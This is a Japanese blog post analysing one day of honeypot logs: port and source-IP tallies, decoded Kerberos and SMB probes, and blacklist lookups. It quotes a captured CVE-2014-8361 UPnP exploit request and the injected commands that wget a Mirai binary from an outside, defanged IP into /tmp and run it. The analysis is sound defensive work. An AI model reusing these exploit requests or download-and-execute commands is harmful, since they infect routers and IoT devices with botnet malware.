ハニーポット分析(3日目:2018/8/10)
3日目である 2018/8/10 のハニーポット分析です。
今回、WoWHoneypotのログも分析しようと思いましたが、誤ってデリートしてしまいました。。。。よって、今回は Honeytrapのみの分析となります。
1.Honeytrap
検知数:8,503 件
<宛先ポートごとの検知数 TOP10>
ポート | 件数 | 割合 | サービス |
445 | 2,619 | 33.86% | SMB |
23 | 1,452 | 18.77% | TELNET |
3306 | 478 | 6.18% | MySQL |
5900 | 346 | 4.47% | VNC |
2323 | 165 | 2.13% | TELNET |
52869 | 84 | 1.09% | D-Link, Realtek SDK |
1433 | 65 | 0.84% | Microsoft SQL Server |
20000 | 63 | 0.81% |
? |
3389 | 54 | 0.70% | RDP |
8080 | 54 | 0.70% | PROXY |
今回は宛先ポート番号は 20000 が増加していました。ポート番号 20000について、調べて見たのですが、サービスを断定することが出来ませんでした。検知内容は HEX形式でエンコードされているため、いくつかデコードして見ました。
・^0\ P¢NM£0 ¡0krbtgtNM¥19700101000000Z§¹Ù¨0
・¤ÿSMBr@@PC NETWORK PROGRAM 1.0MICROSOFT NETWORKS 1.03MICROSOFT NETWORKS 3.0LANMAN1.0LM1.2X002SambaNT LANMAN 1.0NT LM 0.12
読める文字列から推測すると KerberosおよびSMBに関する通信を思われます。何かの脆弱性を狙った可能性もありますが、調査までは出来ていません。他の検知については、1日目および2日目と大きく変わっている通信はありませんでした。
<送信元IPごとにおける検知数 TOP10>
送信元IP | ブラックリスト | 検知数 | 割合 |
185.209.0.xx | × | 430 | 11.93% |
185.209.0.xy | × | 363 | 10.07% |
185.156.177.xxx | × | 71 | 1.97% |
80.211.67.xxx | ○ | 56 | 1.55% |
46.166.148.xxx | × | 36 | 1.00% |
176.58.97.xxx | × | 34 | 0.94% |
139.162.183.xx | ○ | 33 | 0.92% |
50.116.56.xxx | ○ | 33 | 0.92% |
66.228.48.xx | × | 33 | 0.92% |
172.104.240.xx | × | 32 | 0.89% |
今回、送信元IPごとの傾向を調べて見ました。ブラックリストは Cisco Talos および X-Force を利用して調査しました。
検知数の多い185.209.0.xx , 185.209.0.xy は様々なハイポートに対してアクセスしているため、ポートスキャンを行なっていると思われます。
ブラックリストへ登録されている送信元IPの通信内容については以下となります。
▪️ 80.211.67.xxx
CVE-2014-8361 の脆弱性を狙ったものであり、リクエスト内容は以下となります。
POST /picsdesc.xml HTTP/1.1
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
User-Agent: python-requests/2.4.3 CPython/2.7.9 Linux/3.16.0-5-amd64
POST /wanipcn.xml HTTP/1.1
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
User-Agent: python-requests/2.4.3 CPython/2.7.9 Linux/3.16.0-5-amd64
実際に検知したコマンド部分を確認したところ、ダウンロードしてくるマルウェアは Mirai関連でした(VirusTotalで確認)
・cd /tmp/;wget http[:]//212[.]237[.]32[.]62/mips -O am
・cd /tmp/;chmod +x am;./am mips
▪️139.162.183.xx , 50.116.56.xxx
検知内容は SMBや Kerberosと推測される通信を検知していました。おそらく、ツールで調査しているものであり、分類はスキャンにカテゴライズかと思います。
今回の分析は以上となります。